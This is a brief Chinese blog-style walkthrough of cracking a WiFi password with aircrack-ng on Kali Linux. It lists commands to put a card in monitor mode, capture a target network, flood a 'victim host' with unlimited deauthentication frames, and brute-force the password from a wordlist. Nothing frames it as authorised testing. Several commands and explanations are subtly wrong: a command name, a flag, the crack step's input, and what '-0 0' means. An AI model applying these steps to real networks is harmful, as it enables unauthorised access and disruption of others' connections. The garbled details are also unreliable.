在kalilinux的aircracke-ng中。在这儿描述自己所遇到的问题并给予写blog
在使用之前,需要确定是否有对应的支持无线网卡监听的网卡,在虚拟机中需要先将网卡的驱动重定向到虚拟机内
在终端以下命令
iwconfig //查看自己的网卡名称
ifconfig wlan0 up //查看自己网卡信息
airmon-ng start wlan0 //开启网卡的监控模式,stop为停止监控模式,开启后iwconfig查看可见wlan名称后加了mon即为监听模式
airodump wlan0mon //开始监听,在监听到所需要进行爆破攻击的wifi后,ctrl+c停止监听,并且记住对应的信道号和mac地址,记住后就停止监听开始下列的操作
airodump-ng -c 1 -bssid MAC -w 文件名 wlan0mon //-c是监控指定信道,bssid则是监控的主机的mac地址,-w是写入抓包数据的路径并且以cap文件保存,wlan0mon则是进行监听的网卡。这个命令在开始没抓到包之前不能关闭
aireplay-ng -0 0 -a MAC地址 -c MAC地址 wlan0mon // 这个命令是对监控的网络下的主机进行信道的占用,并且对正在进行对被害主机和无线网络之间的通信的拦截抓包。其中 -0 0 是抓包的次数,为0则无限发送,直到人为干预停止,-a是需要攻击的无线网络的MAC地址。-c则是被害主机的MAC地址,wlan0mon为发起攻击的主机,在这项攻击之前,需要先将airodump wlan0mon该命令人为干预停止,否则则出现无效抓包,返回的ask值全为0或者较小的值.
aircrack-ng -w 字典 -b 无线网络的mac地址 wlan0mon //开始对该网络进行无线网络密码的爆破